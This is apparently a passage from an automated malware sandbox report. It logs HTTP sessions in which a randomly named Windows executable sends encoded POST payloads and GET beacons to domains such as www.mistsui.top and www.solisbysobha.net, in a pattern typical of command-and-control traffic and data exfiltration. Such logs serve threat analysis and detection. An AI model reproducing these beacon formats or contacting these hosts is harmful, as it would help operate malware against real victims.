                                Data Ascii: 76=eWBPvq1lX887GsELrq7so80GuWR+7QQyhnlfI4y2gugzCdiX/SDa3JJjfltjnNVCLNYKgXyDoGKa7nQMMiZ91x4PhiRZ1gaXjOuhMhDHily/nLYp6IybP3tAs+wleaCuRsPyAAmKhcRqWn3d9ftMSm1hXo1+GTnJ3aSkxDNrux0qnexe4IVhai3zGSWBTOYlmxRYN3NDhCPUcNg/5hzP8uNqvpzD0eReX2zsCCAppuhsTDGcjZjftCutqEvmHINs/OT0ZZTDgdML/p7YiggpNvs0W9bwhQ8LPI65nHm8u2d4XeCJ/WA4GVbq/oG/Gii24ATATRgl3noZU2n1L65FkJ/dFBO75AYhiGTFl0MffyQoXDeYKkWFlTzlVumq6M8IDwCwc6JCwWyAL9kKQYZn9Hg8q6072nXJDR0SG75r8UXHZKesealdIOSHq6OQSxrA9d6pUT1ZUKcukQfUSFapq3HyIaIk4PCzu4ni7FTofmDAiCOMjWE/A7aAQjVbLcSuOMQnyvkTvx5GHpgS1PHf/r5HkFB4w0aC8V6HcTI5aJoP8o1UDkTVYd75w7Q90dCyOvhFBJOEm0+QOmJ0IzkELOOFKiQKgej+zJDQnhLFd6nokkWO1pUz2+S3FpkffmrtBb63JBa6L4EHdqZq2xKYRoPJZGrs3+Cw85qoz+CYth+8bl3jVRP8AH6jCv6z9GjhrYgFmZcLXSiiGPWgdfdMQW/VCLRkJ0GnlykAy+h6uthn/FQeJsQ0UKNvvfcZixPW9Qqvrasg5DN3IQtjzA+SlMvrbgkhfMKVUa9P3W1bqqG9OjAvxPPHIxdXqlnKUmoWqFhO9n52E9TMUzUaUqbHb+Vrw88/dm+ORNjGSBMlUUbR40NftNAGXmDDIdjzS0xL1gveYWoDNRzJ2fbazzVbnNkfxynqqdMJl0k1T7utI5w7FtVKTQawxx6ActI05VJEWph7NKLqU2MbdIUK/B4LD4WL+woHW5QHRZqF+9F8/jK9aiq9K [TRUNCATED]
                                Sep 23, 2024 14:38:02.168457031 CEST367INHTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:01 GMT
                                Server: Apache
                                Content-Length: 203
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 6d 38 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /7m8b/ was not found on this server.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.749720195.110.124.133803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:03.876590967 CEST479OUTGET /7m8b/?76=TUpvsdJ0cs84UNNTqqi2wOMj02pU6E0u1A17Lrv5qeBoN9jB/n++wLdBNnRIp/FdR+Ur2HOcuniO4FwpOA1JnwQ/5G5V4geMmZeqJSORp3yZ3MMA5ZHYDD9/sYl5a677eMHhDnCl+rJp&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.bluegirls.blog
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:38:04.654149055 CEST367INHTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:04 GMT
                                Server: Apache
                                Content-Length: 203
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 6d 38 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /7m8b/ was not found on this server.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.749721162.0.238.246803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:09.988609076 CEST737OUTPOST /r48b/ HTTP/1.1
                                Host: www.mistsui.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.mistsui.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.mistsui.top/r48b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 7a 47 73 53 79 6a 50 33 6b 66 45 72 6b 59 68 7a 63 44 70 77 54 6d 77 6f 51 44 6c 33 69 4d 30 32 4e 43 79 6e 53 6b 35 7a 65 6e 61 4e 54 62 44 4a 61 65 33 6a 2f 61 70 79 35 78 73 49 48 44 4c 79 37 4e 41 47 78 75 38 50 58 31 6d 75 51 38 6d 41 45 54 75 37 70 33 6e 75 74 41 52 6a 53 4c 51 48 33 63 64 56 53 45 30 2b 77 71 33 39 39 47 68 54 4c 45 4b 43 6c 2b 4a 4f 53 53 45 6a 4d 38 4b 74 33 50 70 64 35 77 77 4d 66 74 48 71 35 67 39 59 6c 61 5a 56 76 33 54 50 56 36 6d 61 38 7a 56 6e 58 43 4a 45 38 33 65 77 34 59 74 54 75 46 4d 44 53 6c 57 4d 79 48 77 2f 52 33 36 69 4e 34 5a 56 2b 76 30 6d 70 4f 49 61 2f 47 56 6e 50 37 70 62 77 41 3d 3d
                                Data Ascii: 76=zGsSyjP3kfErkYhzcDpwTmwoQDl3iM02NCynSk5zenaNTbDJae3j/apy5xsIHDLy7NAGxu8PX1muQ8mAETu7p3nutARjSLQH3cdVSE0+wq399GhTLEKCl+JOSSEjM8Kt3Ppd5wwMftHq5g9YlaZVv3TPV6ma8zVnXCJE83ew4YtTuFMDSlWMyHw/R36iN4ZV+v0mpOIa/GVnP7pbwA==
                                Sep 23, 2024 14:38:10.578469992 CEST595INHTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:10 GMT
                                Server: Apache
                                X-Frame-Options: SAMEORIGIN
                                Content-Length: 389
                                X-XSS-Protection: 1; mode=block
                                Connection: close
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.749722162.0.238.246803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:12.534504890 CEST757OUTPOST /r48b/ HTTP/1.1
                                Host: www.mistsui.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.mistsui.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.mistsui.top/r48b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 7a 47 73 53 79 6a 50 33 6b 66 45 72 31 49 52 7a 64 67 78 77 48 32 77 72 65 6a 6c 33 6f 73 30 36 4e 43 75 6e 53 6d 56 6a 64 56 2b 4e 4b 36 7a 4a 62 62 44 6a 73 71 70 79 73 42 73 33 4b 6a 4c 44 37 4e 4d 6b 78 76 41 50 58 31 43 75 51 39 57 41 45 67 47 6b 72 6e 6e 67 6c 67 52 68 4e 37 51 48 33 63 64 56 53 48 49 59 77 73 66 39 39 33 52 54 4c 6c 4b 42 76 65 4a 4e 43 69 45 6a 49 38 4c 71 33 50 70 76 35 78 38 32 66 75 2f 71 35 6c 5a 59 6c 6f 39 53 30 48 54 4a 49 71 6e 39 2f 67 77 66 4f 79 68 74 77 57 32 45 78 36 31 6c 72 7a 52 68 49 48 61 67 73 57 49 45 56 31 65 55 61 65 45 67 38 75 77 2b 6b 73 38 37 67 78 77 4e 43 70 49 66 6d 79 74 59 35 50 45 78 79 78 54 50 36 72 43 62 74 62 64 68 41 77 38 3d
                                Data Ascii: 76=zGsSyjP3kfEr1IRzdgxwH2wrejl3os06NCunSmVjdV+NK6zJbbDjsqpysBs3KjLD7NMkxvAPX1CuQ9WAEgGkrnnglgRhN7QH3cdVSHIYwsf993RTLlKBveJNCiEjI8Lq3Ppv5x82fu/q5lZYlo9S0HTJIqn9/gwfOyhtwW2Ex61lrzRhIHagsWIEV1eUaeEg8uw+ks87gxwNCpIfmytY5PExyxTP6rCbtbdhAw8=
                                Sep 23, 2024 14:38:13.137239933 CEST595INHTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:13 GMT
                                Server: Apache
                                X-Frame-Options: SAMEORIGIN
                                Content-Length: 389
                                X-XSS-Protection: 1; mode=block
                                Connection: close
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.749723162.0.238.246803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:15.120706081 CEST1770OUTPOST /r48b/ HTTP/1.1
                                Host: www.mistsui.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.mistsui.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.mistsui.top/r48b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 7a 47 73 53 79 6a 50 33 6b 66 45 72 31 49 52 7a 64 67 78 77 48 32 77 72 65 6a 6c 33 6f 73 30 36 4e 43 75 6e 53 6d 56 6a 64 56 32 4e 57 59 37 4a 61 38 76 6a 39 61 70 79 77 52 73 4d 4b 6a 4c 6b 37 4d 6b 67 78 76 4e 79 58 33 4b 75 66 2f 75 41 54 68 47 6b 69 6e 6e 67 70 41 52 69 53 4c 51 65 33 66 6c 76 53 45 67 59 77 73 66 39 39 30 4a 54 43 55 4b 42 67 2b 4a 4f 53 53 45 2f 4d 38 4c 4f 33 50 78 46 35 78 6f 6d 66 65 66 71 35 46 70 59 32 37 5a 53 34 48 54 4c 4c 71 6e 6c 2f 67 4d 41 4f 79 39 70 77 57 44 76 78 36 64 6c 70 33 77 72 64 30 71 70 2f 56 78 59 55 30 2b 42 4d 2f 52 52 6b 59 73 35 71 2b 30 6a 67 43 67 6f 44 70 38 44 72 69 41 41 6b 63 4d 62 31 77 2f 73 72 62 6e 35 2f 4f 5a 44 58 51 46 4c 4d 43 75 4c 42 4e 59 63 7a 4c 4d 36 68 5a 41 31 2f 4c 79 6d 78 44 4c 6a 4f 63 6a 4b 51 6b 6b 46 34 30 55 76 48 71 52 57 31 50 63 71 36 76 6f 47 47 41 75 35 63 41 70 32 48 71 56 31 4f 2f 61 78 61 66 75 49 72 55 54 6a 70 6a 4a 54 6d 67 44 77 74 4c 46 2b 64 41 39 56 4b 38 4a 31 79 4c 62 4f 53 4c 36 70 77 48 34 [TRUNCATED]
                                Data Ascii: 76=zGsSyjP3kfEr1IRzdgxwH2wrejl3os06NCunSmVjdV2NWY7Ja8vj9apywRsMKjLk7MkgxvNyX3Kuf/uAThGkinngpARiSLQe3flvSEgYwsf990JTCUKBg+JOSSE/M8LO3PxF5xomfefq5FpY27ZS4HTLLqnl/gMAOy9pwWDvx6dlp3wrd0qp/VxYU0+BM/RRkYs5q+0jgCgoDp8DriAAkcMb1w/srbn5/OZDXQFLMCuLBNYczLM6hZA1/LymxDLjOcjKQkkF40UvHqRW1Pcq6voGGAu5cAp2HqV1O/axafuIrUTjpjJTmgDwtLF+dA9VK8J1yLbOSL6pwH4aS43UTk3jgiYHVglBx/A3YMdPcmefwGm25vJwUDC9jjh5g87BsXIBK1igE4bE8kkrpEPBS8f5sfOuEyFwCt1K3AOaqATOgURCTWOsIPiQucFVu4ySk+durcGKurUYdAngS5xBoFoSxiKbgBcOwe0iwc+jvHSywKnduMUToDymDOzkgZlWojyvogm1moRVkSFf/X0negbx/UteT/mU5ddM6GKMrkadQz7RUV3J3/GAsOoNrdY06NN2Wlil8FQCSqhNtKuRTqbfARziwiuEbJ+GbSXznOsv4WRnpXonUcXwsMVILpuWp5fuWcPxoHaKB/24Q6PrqOwVxa86fzG5Bf7dmkVAzLHlCJEnMz1jJBmyopi7kfoIebIkRn5ZKaczlF6wMNSPLFoZqEHXvgr2G9Bw/GqZU0z9Ub4TfmoGD6r+cP6tvp2rHxsyzMXfEhbozV5evdatIrGK4vOPbXWOTiZDncU6e0AOU05g+MD6Lng5E5OjM7wpCocuepKhSrEpkXEPsKwSMzoLGD0NIS4iWKBJpBkVl3Z3PzC68DDbxN5dH8trYWN4ln601/wfcxVZ36lK/FUOvvpRR8TFgCOmZC1DDo9WzhMup5r4gQOeiF3oVuqh3ECnyNW8TwNSsX9VD2JsokFcU9kLPpTnK8Ve5ISrcqDMZrV316UZ9 [TRUNCATED]
                                Sep 23, 2024 14:38:15.731651068 CEST595INHTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:15 GMT
                                Server: Apache
                                X-Frame-Options: SAMEORIGIN
                                Content-Length: 389
                                X-XSS-Protection: 1; mode=block
                                Connection: close
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.749724162.0.238.246803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:17.654906988 CEST476OUTGET /r48b/?76=+EEyxXn2ifp2lL4tSgcDej4IKTVVubAXRia9ZGYNaFbCIrCUSrCroJ1ltkc3MgDLuvAkyd1hc3+ySf3CEzuTuCrdjxUcb6kt1JtpL21e+JT78DJZMGSekOhJaCk+Ht+qyblm0D0jZ5Dr&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.mistsui.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:38:18.235691071 CEST610INHTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:18 GMT
                                Server: Apache
                                X-Frame-Options: SAMEORIGIN
                                Content-Length: 389
                                X-XSS-Protection: 1; mode=block
                                Connection: close
                                Content-Type: text/html; charset=utf-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.749725198.50.252.64803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:24.603214025 CEST752OUTPOST /s5b1/ HTTP/1.1
                                Host: www.solisbysobha.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.solisbysobha.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.solisbysobha.net/s5b1/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 56 64 63 54 61 42 4c 64 6b 69 74 54 6d 41 43 69 45 68 31 31 4f 74 45 46 39 4b 78 70 2f 43 58 7a 54 4b 6a 78 31 57 4f 51 56 68 32 2f 53 70 48 4b 73 51 75 62 6f 45 56 36 46 54 6b 69 32 64 52 46 71 75 78 42 69 79 50 34 78 6a 69 48 35 54 50 78 74 4b 38 63 37 4d 68 4f 70 57 6d 32 58 4b 59 59 68 62 62 55 54 79 2f 63 66 71 73 2b 2f 6a 70 74 41 6d 64 52 6d 6d 64 63 41 44 49 69 77 6d 6d 36 39 6e 54 71 33 52 2b 6d 72 67 66 79 6c 37 79 58 68 67 6a 4c 79 4d 74 39 79 48 4c 65 74 7a 2b 4e 4d 50 69 4d 31 43 57 54 2f 30 2b 61 41 73 35 56 55 66 6b 33 33 2b 70 6c 30 64 33 42 66 68 38 39 58 6d 43 6d 6f 54 51 33 75 68 54 71 74 6a 33 35 79 51 3d 3d
                                Data Ascii: 76=VdcTaBLdkitTmACiEh11OtEF9Kxp/CXzTKjx1WOQVh2/SpHKsQuboEV6FTki2dRFquxBiyP4xjiH5TPxtK8c7MhOpWm2XKYYhbbUTy/cfqs+/jptAmdRmmdcADIiwmm69nTq3R+mrgfyl7yXhgjLyMt9yHLetz+NMPiM1CWT/0+aAs5VUfk33+pl0d3Bfh89XmCmoTQ3uhTqtj35yQ==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.749726198.50.252.64803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:27.142273903 CEST772OUTPOST /s5b1/ HTTP/1.1
                                Host: www.solisbysobha.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.solisbysobha.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.solisbysobha.net/s5b1/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
